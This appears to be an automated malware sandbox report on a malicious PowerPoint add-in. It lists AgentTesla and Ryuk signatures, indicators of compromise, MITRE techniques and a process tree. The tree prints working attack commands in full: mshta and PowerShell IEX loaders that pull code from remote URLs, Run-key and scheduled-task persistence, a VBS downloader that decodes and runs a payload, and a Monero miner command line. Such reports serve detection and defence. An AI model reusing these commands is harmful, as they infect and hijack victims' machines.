oshBJzN0S5fh+DtrSFbUf9t/8FJYyN8Fs2iHykS5MY7RAAmdwC4ht5SUHqkcReROrdL96V7+E3hxSEtd39hiWhyGGkM3QLl/F6P0uKVskm0MvSPEOW7yM+gTeXtEjCvIEVpwjkKJ4b3P+hrAEMZbjI74g1cZZzewCffWqG3tmbZodv7WEVP59XxINnUV402gA9p3E9PlIKNtrn484D6szTvmE/ZbIhtFcmxejswyF8AUvz/irw2Zd0IlJr/zrDOwjK5igC5Hp4ushR0MyBWvqVEPJ5y0PSr9X0kiuyaAr6lQa+7UZK0t/o5T7o0kNqoVoshBJzN0S5fh+DtrSFbl2lSUowtW1cS0rLLP4gYQJEPMWnqhyJW95LtYjgii6ExbWTJ6t/x3JMKMXb+TlqmiWhyGGkM3QLl/F6P0uKVscxmdMnbF+H3Wyck+dcR+C/tcHhHajylOcAoCzDShlnHJdXS4Pmnfp/tOeipNc1oMZ1AolcqctWDIs6YALIDAGwFb2xcuV4fcbJzR63xF5LM4HSGKUqqwxaEHtuCauTji81ZsG+ak+TGD+ZgRBSKvp9XswZFl+DUgrKkA62vHafiNS/hR6A1wimSRpA8I+Q/ft2lcydCEgJHLvyltCqTwuwy56xYgqWbXzIn74O/eimEBv1nGY6Veg2SFdoQW6OO1q6DC6wXyfeyWAmGjYZ3FMrqPIoDfJ/5JbBYaMildXwsq+ggO8l8nnsFgpxIW2dBz/KgJ0uAOY5ZM7t+Wl8aq4w7SUJyfDkYXh/423c31S+sq+ggO8l8nnsFgpxIW2dBzfXn3Zlr24rOwUSVjQjPJ2eZFnKlh8BalFh6RrdcYAzS9ZiLGgvyL36etzadTzQteq6DC6wXyfeyWAmGjYZ3FMnrxORhACEXDYyiy2Nyg1sXMa3AGC72lyrJ8UbCOh1GkjnT+SVN+YgxXU3IRCSK+RpqPIoDfJ/5JbBYaMildXwM2HYKA0yBql20a4UfWhHNfxodDYIsbXKvmwTtJ4EWbQ2zLlCu2ylpAG8DCzYKeJrMqiOdBShtC8ZJWPZcE+76Ge4Nx0nWqQcBIPT4Qiig/kHjaD1ifwUELZegIElh0k1V+/qbpsuje4+3Yh1t+kUPOxodDYIsbXKvmwTtJ4EWbQGj2Nghwudp8aCP1mgTYtBpt3bv6rGV+Onknk0uLV/tjNsJGRp0nLdygfG0qr4Hd5v0eZk6Tej4BddKmRfQzWwK+bT7ai7+0GAMcKNylarAixodDYIsbXKvmwTtJ4EWbQiiM6y0skgXfs5Fmf5qjoQ/W

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	4372	4656	mshta.exe	67
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3928	804	powershell.exe	77

Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
ransomware ryuk

AgentTesla Payload 1 IoCs

resource	yara_rule
behavioral2/memory/4000-186-0x0000000000437DCE-mapping.dmp	family_agenttesla

Blocklisted process makes network request 27 IoCs

flow	pid	Process
31	4372	mshta.exe
33	4372	mshta.exe
35	4372	mshta.exe
37	4372	mshta.exe
39	4372	mshta.exe
41	4372	mshta.exe
43	4372	mshta.exe
45	4372	mshta.exe
47	4372	mshta.exe
49	4372	mshta.exe
51	4372	mshta.exe
52	4372	mshta.exe
53	4372	mshta.exe
54	4372	mshta.exe
56	4372	mshta.exe
59	3928	powershell.exe
61	3928	powershell.exe
65	3928	powershell.exe
68	1776	mshta.exe
69	1776	mshta.exe
70	1776	mshta.exe
71	1776	mshta.exe
72	1776	mshta.exe
74	4300	WScript.exe
76	4300	WScript.exe
78	4300	WScript.exe
80	4300	WScript.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	aspnet_compiler.exe

Executes dropped EXE 1 IoCs

pid	Process
576	bin.txt

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4600-219-0x0000000140000000-0x0000000140717000-memory.dmp	upx

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\dkkkksakdosexography = "\"mshta\"\"http://1230948%[email protected]/p/19.html\""	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"mshta\"\"http://1230948%[email protected]/p/19.html\""	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\nunukhaoo = "\"mshta\"\"http://1230948%[email protected]/p/19.html\""	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\replcia = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).nasdnasndnad)\|IEX\"\", 0 : window.close\")"	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\DLESOLCRETSAM = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).MSOFFICELO)\|IEX\"\", 0 : window.close\")"	mshta.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\taskschd.msc	mmc.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 3928 set thread context of 4000	3928	powershell.exe	92
PID 576 set thread context of 4600	576	bin.txt	100

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2148	4372	WerFault.exe	82

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	POWERPNT.EXE

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
2648	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	POWERPNT.EXE

Kills process with taskkill 1 IoCs

evasion

pid	Process
4568	taskkill.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings	cmd.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	WScript.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4656	POWERPNT.EXE

Suspicious behavior: EnumeratesProcesses 22 IoCs

pid	Process
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
2148	WerFault.exe
2148	WerFault.exe
2148	WerFault.exe
2148	WerFault.exe
2148	WerFault.exe
2148	WerFault.exe
2148	WerFault.exe
2148	WerFault.exe
2148	WerFault.exe
2148	WerFault.exe
2148	WerFault.exe
2148	WerFault.exe
2148	WerFault.exe
2148	WerFault.exe
2148	WerFault.exe
3928	powershell.exe
3928	powershell.exe
4000	aspnet_compiler.exe
4000	aspnet_compiler.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4152	mmc.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

pid	Process
4000	aspnet_compiler.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3928	powershell.exe
Token: SeDebugPrivilege	4568	taskkill.exe
Token: SeIncreaseQuotaPrivilege	3928	powershell.exe
Token: SeSecurityPrivilege	3928	powershell.exe
Token: SeTakeOwnershipPrivilege	3928	powershell.exe
Token: SeLoadDriverPrivilege	3928	powershell.exe
Token: SeSystemProfilePrivilege	3928	powershell.exe
Token: SeSystemtimePrivilege	3928	powershell.exe
Token: SeProfSingleProcessPrivilege	3928	powershell.exe
Token: SeIncBasePriorityPrivilege	3928	powershell.exe
Token: SeCreatePagefilePrivilege	3928	powershell.exe
Token: SeBackupPrivilege	3928	powershell.exe
Token: SeRestorePrivilege	3928	powershell.exe
Token: SeShutdownPrivilege	3928	powershell.exe
Token: SeDebugPrivilege	3928	powershell.exe
Token: SeSystemEnvironmentPrivilege	3928	powershell.exe
Token: SeRemoteShutdownPrivilege	3928	powershell.exe
Token: SeUndockPrivilege	3928	powershell.exe
Token: SeManageVolumePrivilege	3928	powershell.exe
Token: 33	3928	powershell.exe
Token: 34	3928	powershell.exe
Token: 35	3928	powershell.exe
Token: 36	3928	powershell.exe
Token: SeIncreaseQuotaPrivilege	3928	powershell.exe
Token: SeSecurityPrivilege	3928	powershell.exe
Token: SeTakeOwnershipPrivilege	3928	powershell.exe
Token: SeLoadDriverPrivilege	3928	powershell.exe
Token: SeSystemProfilePrivilege	3928	powershell.exe
Token: SeSystemtimePrivilege	3928	powershell.exe
Token: SeProfSingleProcessPrivilege	3928	powershell.exe
Token: SeIncBasePriorityPrivilege	3928	powershell.exe
Token: SeCreatePagefilePrivilege	3928	powershell.exe
Token: SeBackupPrivilege	3928	powershell.exe
Token: SeRestorePrivilege	3928	powershell.exe
Token: SeShutdownPrivilege	3928	powershell.exe
Token: SeDebugPrivilege	3928	powershell.exe
Token: SeSystemEnvironmentPrivilege	3928	powershell.exe
Token: SeRemoteShutdownPrivilege	3928	powershell.exe
Token: SeUndockPrivilege	3928	powershell.exe
Token: SeManageVolumePrivilege	3928	powershell.exe
Token: 33	3928	powershell.exe
Token: 34	3928	powershell.exe
Token: 35	3928	powershell.exe
Token: 36	3928	powershell.exe
Token: SeDebugPrivilege	2148	WerFault.exe
Token: SeDebugPrivilege	4000	aspnet_compiler.exe
Token: 33	4152	mmc.exe
Token: SeIncBasePriorityPrivilege	4152	mmc.exe
Token: 33	4152	mmc.exe
Token: SeIncBasePriorityPrivilege	4152	mmc.exe
Token: 33	4152	mmc.exe
Token: SeIncBasePriorityPrivilege	4152	mmc.exe
Token: 33	4152	mmc.exe
Token: SeIncBasePriorityPrivilege	4152	mmc.exe
Token: 33	4152	mmc.exe
Token: SeIncBasePriorityPrivilege	4152	mmc.exe
Token: 33	4152	mmc.exe
Token: SeIncBasePriorityPrivilege	4152	mmc.exe
Token: 33	4152	mmc.exe
Token: SeIncBasePriorityPrivilege	4152	mmc.exe
Token: 33	4152	mmc.exe
Token: SeIncBasePriorityPrivilege	4152	mmc.exe
Token: 33	4152	mmc.exe
Token: SeIncBasePriorityPrivilege	4152	mmc.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
4656	POWERPNT.EXE
4656	POWERPNT.EXE
4656	POWERPNT.EXE
4372	mshta.exe
4152	mmc.exe
4152	mmc.exe
4000	aspnet_compiler.exe

Suspicious use of WriteProcessMemory 32 IoCs

description	pid	Process	procid_target
PID 4656 wrote to memory of 4372	4656	POWERPNT.EXE	82
PID 4656 wrote to memory of 4372	4656	POWERPNT.EXE	82
PID 4372 wrote to memory of 2648	4372	mshta.exe	85
PID 4372 wrote to memory of 2648	4372	mshta.exe	85
PID 4372 wrote to memory of 4568	4372	mshta.exe	87
PID 4372 wrote to memory of 4568	4372	mshta.exe	87
PID 3928 wrote to memory of 3948	3928	powershell.exe	91
PID 3928 wrote to memory of 3948	3928	powershell.exe	91
PID 3928 wrote to memory of 3948	3928	powershell.exe	91
PID 3928 wrote to memory of 4000	3928	powershell.exe	92
PID 3928 wrote to memory of 4000	3928	powershell.exe	92
PID 3928 wrote to memory of 4000	3928	powershell.exe	92
PID 3928 wrote to memory of 4000	3928	powershell.exe	92
PID 3928 wrote to memory of 4000	3928	powershell.exe	92
PID 3928 wrote to memory of 4000	3928	powershell.exe	92
PID 3928 wrote to memory of 4000	3928	powershell.exe	92
PID 3928 wrote to memory of 4000	3928	powershell.exe	92
PID 1496 wrote to memory of 1776	1496	mshta.exe	95
PID 1496 wrote to memory of 1776	1496	mshta.exe	95
PID 1776 wrote to memory of 3120	1776	mshta.exe	96
PID 1776 wrote to memory of 3120	1776	mshta.exe	96
PID 3120 wrote to memory of 4300	3120	cmd.exe	98
PID 3120 wrote to memory of 4300	3120	cmd.exe	98
PID 4300 wrote to memory of 576	4300	WScript.exe	99
PID 4300 wrote to memory of 576	4300	WScript.exe	99
PID 576 wrote to memory of 4600	576	bin.txt	100
PID 576 wrote to memory of 4600	576	bin.txt	100
PID 576 wrote to memory of 4600	576	bin.txt	100
PID 576 wrote to memory of 4600	576	bin.txt	100
PID 576 wrote to memory of 4600	576	bin.txt	100
PID 576 wrote to memory of 4600	576	bin.txt	100
PID 576 wrote to memory of 4600	576	bin.txt	100

C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\PO - CE AUSTRALIA PTY LTD.ppam" /ou ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4656
- C:\Windows\SYSTEM32\mshta.exe
  mshta http://www.j.mp/llsoaskokcdokoktewelvw
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Adds Run key to start application
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4372
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%[email protected]/p/19.html""\"", 0 : window.close"\")
    3⤵
    - Creates scheduled task(s)
    PID:2648
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /f /im Excel.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4568
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 4372 -s 3048
    3⤵
    - Program crash
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2148

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -noexit ((gp HKCU:\Software).MSOFFICELO)|IEX
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3928
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
  #cmd
  2⤵
  PID:3948
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
  #cmd
  2⤵
  - Drops file in Drivers directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: SetClipboardViewer
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:4000

C:\Windows\system32\mmc.exe
"C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /s
1⤵
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4152

\??\c:\windows\system32\mshta.exe
mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""mshta http://1230948%[email protected]/p/19.html"", 0 : window.close")
1⤵
- Suspicious use of WriteProcessMemory
PID:1496
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" http://1230948[email protected]/p/19.html
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of WriteProcessMemory
  PID:1776
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c cd C:\Users\Public &@echo dim http_obj >>lulupupugugugagamotherfucker.vbs &@echo dim stream_obj >>lulupupugugugagamotherfucker.vbs &@echo dim shell_obj >>lulupupugugugagamotherfucker.vbs &@echo set http_obj = CreateObject("Microsoft.XMLHTTP") >>lulupupugugugagamotherfucker.vbs &@echo set stream_obj = CreateObject("ADODB.Stream") >>lulupupugugugagamotherfucker.vbs &@echo set shell_obj = GetObject("new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B") >>lulupupugugugagamotherfucker.vbs &@echo URL = "https://5940e470-33c6-4a99-b802-7f11323388a6.usrfiles.com/ugd/5940e4_39e7aca5ca73408f9ea38510ed3aa48e.txt">>lulupupugugugagamotherfucker.vbs &@echo http_obj.open "GET", URL, False >>lulupupugugugagamotherfucker.vbs &@echo http_obj.send >>lulupupugugugagamotherfucker.vbs &@echo stream_obj.type = 1 >>lulupupugugugagamotherfucker.vbs &@echo stream_obj.open >>lulupupugugugagamotherfucker.vbs &@echo stream_obj.write http_obj.responseBody >>lulupupugugugagamotherfucker.vbs &@echo stream_obj.savetofile "C:\Users\Public\scan.txt", 2 >>lulupupugugugagamotherfucker.vbs &@echo Dim xxx >>lulupupugugugagamotherfucker.vbs &@echo Set xxx = CreateObject("Scripting.FileSystemObject") >>lulupupugugugagamotherfucker.vbs &@echo Set file = xxx.OpenTextFile("C:\Users\Public\scan.txt", 1) >>lulupupugugugagamotherfucker.vbs &@echo content = file.ReadAll >>lulupupugugugagamotherfucker.vbs &@echo content = StrReverse(content) >>lulupupugugugagamotherfucker.vbs &@echo Dim fso >>lulupupugugugagamotherfucker.vbs &@echo Dim fdsafdsa >>lulupupugugugagamotherfucker.vbs &@echo Dim oNode, fdsaa >>lulupupugugugagamotherfucker.vbs &@echo Const adTypeBinary = 1 >>lulupupugugugagamotherfucker.vbs &@echo Const adSaveCreateOverWrite = 2 >>lulupupugugugagamotherfucker.vbs &@echo Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64") >>lulupupugugugagamotherfucker.vbs &@echo oNode.dataType = "bin.base64">>lulupupugugugagamotherfucker.vbs &@echo oNode.Text = content >>lulupupugugugagamotherfucker.vbs &@echo Set fdsaa = CreateObject("ADODB.Stream") >>lulupupugugugagamotherfucker.vbs &@echo fdsaa.Type = adTypeBinary >>lulupupugugugagamotherfucker.vbs &@echo tempdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("C:\Users\Public\bin.txt") >>lulupupugugugagamotherfucker.vbs &@echo LocalFile = tempdir >>lulupupugugugagamotherfucker.vbs &@echo fdsaa.Open >>lulupupugugugagamotherfucker.vbs &@echo fdsaa.Write oNode.nodeTypedValue >>lulupupugugugagamotherfucker.vbs &@echo fdsaa.SaveToFile LocalFile, adSaveCreateOverWrite >>lulupupugugugagamotherfucker.vbs &@echo Set fso = CreateObject("Scripting.FileSystemObject") >>lulupupugugugagamotherfucker.vbs &@echo Set fdsafdsa = GetObject("new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B") >>lulupupugugugagamotherfucker.vbs &@echo If (fso.FileExists(LocalFile)) Then >>lulupupugugugagamotherfucker.vbs &@echo fdsafdsa.Exec (LocalFile) >>lulupupugugugagamotherfucker.vbs &@echo End If >>lulupupugugugagamotherfucker.vbs& lulupupugugugagamotherfucker.vbs &dEl lulupupugugugagamotherfucker.vbs
    3⤵
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:3120
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Public\lulupupugugugagamotherfucker.vbs"
      4⤵
      Blocklisted process makes network request
      Modifies system certificate store
      Suspicious use of WriteProcessMemory
      PID:4300
    - - C:\Users\Public\bin.txt
        
        C:\Users\Public\bin.txt
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:576
      - C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe -B --donate-level=1 -a cryptonight --url=pool.supportxmr.com:5555 -u 8AsWuFbYMBQQFKBWQDAMiqgZnQLSQjB7p6hrYwxdocCvFdgJjYjckDiLGTEzwGRidoTZjnobmuwChgcNawxgur9f7i9fb88 -p x -R --variant=-1 -t 1 --max-cpu-usage=50
        6⤵
        
        PID:4600

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/3928-181-0x000002A1F2670000-0x000002A1F2672000-memory.dmp

Filesize
8KB

Download
memory/3928-182-0x000002A1F2673000-0x000002A1F2675000-memory.dmp

Filesize
8KB

Download
memory/3928-184-0x000002A1F2676000-0x000002A1F2678000-memory.dmp

Filesize
8KB

Download
memory/3928-185-0x000002A1F2678000-0x000002A1F2679000-memory.dmp

Filesize
4KB

Download
memory/4000-187-0x0000000003100000-0x0000000003101000-memory.dmp

Filesize
4KB

Download
memory/4000-222-0x0000000003101000-0x0000000003102000-memory.dmp

Filesize
4KB

Download
memory/4152-189-0x000000001C762000-0x000000001C764000-memory.dmp

Filesize
8KB

Download
memory/4152-194-0x00007FF6CA730000-0x00007FF6CA731000-memory.dmp

Filesize
4KB

Download
memory/4152-190-0x000000001C764000-0x000000001C765000-memory.dmp

Filesize
4KB

Download
memory/4152-191-0x000000001C765000-0x000000001C766000-memory.dmp

Filesize
4KB

Download
memory/4152-196-0x000000001C768000-0x000000001C76A000-memory.dmp

Filesize
8KB

Download
memory/4152-188-0x000000001C760000-0x000000001C762000-memory.dmp

Filesize
8KB

Download
memory/4152-195-0x000000001C76A000-0x000000001C76F000-memory.dmp

Filesize
20KB

Download
memory/4152-192-0x000000001C766000-0x000000001C767000-memory.dmp

Filesize
4KB

Download
memory/4152-193-0x000000001C767000-0x000000001C768000-memory.dmp

Filesize
4KB

Download
memory/4600-221-0x00000000139D0000-0x00000000139F0000-memory.dmp

Filesize
128KB

Download
memory/4600-220-0x0000000002F60000-0x0000000002F80000-memory.dmp

Filesize
128KB

Download
memory/4600-219-0x0000000140000000-0x0000000140717000-memory.dmp

Filesize
7.1MB

Download
memory/4656-123-0x00007FFA55350000-0x00007FFA57245000-memory.dmp

Filesize
31.0MB

Download
memory/4656-116-0x00007FFA38500000-0x00007FFA38510000-memory.dmp

Filesize
64KB

Download
memory/4656-115-0x00007FFA38500000-0x00007FFA38510000-memory.dmp

Filesize
64KB

Download
memory/4656-117-0x00007FFA38500000-0x00007FFA38510000-memory.dmp

Filesize
64KB

Download
memory/4656-119-0x00007FFA38500000-0x00007FFA38510000-memory.dmp

Filesize
64KB

Download
memory/4656-118-0x00007FFA5A210000-0x00007FFA5BDED000-memory.dmp

Filesize
27.9MB

Download
memory/4656-122-0x000001CDAEE80000-0x000001CDAFF6E000-memory.dmp

Filesize
16.9MB

Download
memory/4656-114-0x00007FFA38500000-0x00007FFA38510000-memory.dmp

Filesize
64KB

Download